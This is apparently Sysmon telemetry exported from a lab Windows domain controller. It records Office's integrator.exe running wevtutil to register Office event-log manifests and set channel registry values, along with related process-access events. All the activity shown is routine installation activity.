13241300x800000000000000072279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.829{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\IsolationDWORD (0x00000000) 13241300x800000000000000072278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.829{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\WordChannel\OwningPublisher{daf0b914-9c1c-450a-81b2-fea7244f6ffa} 10341000x800000000000000072277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.719{A7A01FEF-EB7D-607E-990B-00000000BB01}63841412C:\Windows\system32\conhost.exe{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.719{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-990B-00000000BB01}6384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165340C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.715{A7A01FEF-EB7D-607E-980B-00000000BB01}6988C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man" /rf:"C:\Program Files\Microsoft Office\root\Office16\wwlib.dll" /mf:"C:\Program Files\Microsoft Office\root\Office16\wwlib.dll"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 23542300x800000000000000072268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.704{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.manMD5=3D705868DF16EE52CDD1B9C52242AB0E,SHA256=DE585DB36CCD520B20CF89928EC0FAACC6D6E02EA7501D093A484A364A33FED2,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 13241300x800000000000000072267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.672{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\TypeDWORD (0x00000002) 13241300x800000000000000072266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.672{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\ChannelAccessO:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573) 13241300x800000000000000072265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.672{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\IsolationDWORD (0x00000000) 13241300x800000000000000072264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.672{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\EnabledDWORD (0x00000000) 13241300x800000000000000072263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.672{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\AirSpaceChannel\OwningPublisher{f562bb8e-422d-4b5c-b20e-90d710f7d11c} 10341000x800000000000000072262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.610{A7A01FEF-EB7D-607E-970B-00000000BB01}16846360C:\Windows\system32\conhost.exe{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-970B-00000000BB01}1684C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.594{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165340C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2f9c6d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2efed5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000072254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.598{A7A01FEF-EB7D-607E-960B-00000000BB01}5924C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe im "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\AirSpace.Etw.man" /rf:"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\mso.dll" /mf:"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\mso.dll"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 13241300x800000000000000072253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\TypeDWORD (0x00000003) 13241300x800000000000000072252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\ChannelAccessO:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573) 13241300x800000000000000072251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\IsolationDWORD (0x00000000) 13241300x800000000000000072250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\EnabledDWORD (0x00000000) 13241300x800000000000000072249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeDebugChannel\OwningPublisher{8736922d-e8b2-47eb-8564-23e77e728cf3} 13241300x800000000000000072248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\TypeDWORD (0x00000002) 13241300x800000000000000072247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\ChannelAccessO:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573) 13241300x800000000000000072246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\IsolationDWORD (0x00000000) 13241300x800000000000000072245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\EnabledDWORD (0x00000000) 13241300x800000000000000072244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.563{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\OfficeChannel\OwningPublisher{8736922d-e8b2-47eb-8564-23e77e728cf3} 13241300x800000000000000072243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.501{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\TypeDWORD (0x00000002) 13241300x800000000000000072242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.501{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\ChannelAccessO:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x7;;;SO)(A;;0x3;;;IU)(A;;0x3;;;SU)(A;;0x3;;;S-1-5-3)(A;;0x3;;;S-1-5-33)(A;;0x1;;;S-1-5-32-573) 13241300x800000000000000072241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.501{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\IsolationDWORD (0x00000000) 13241300x800000000000000072240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.501{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\EnabledDWORD (0x00000000) 13241300x800000000000000072239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:55:57.501{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\General Logging\OwningPublisher{f50d9315-e17e-43c1-8370-3edf6cc057be} 10341000x800000000000000072238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-EB7D-607E-950B-00000000BB01}62805536C:\Windows\system32\conhost.exe{A7A01FEF-EB7D-607E-940B-00000000BB01}5580C:\Windows\System32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7D-607E-950B-00000000BB01}6280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000072236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:57.438{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000072235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 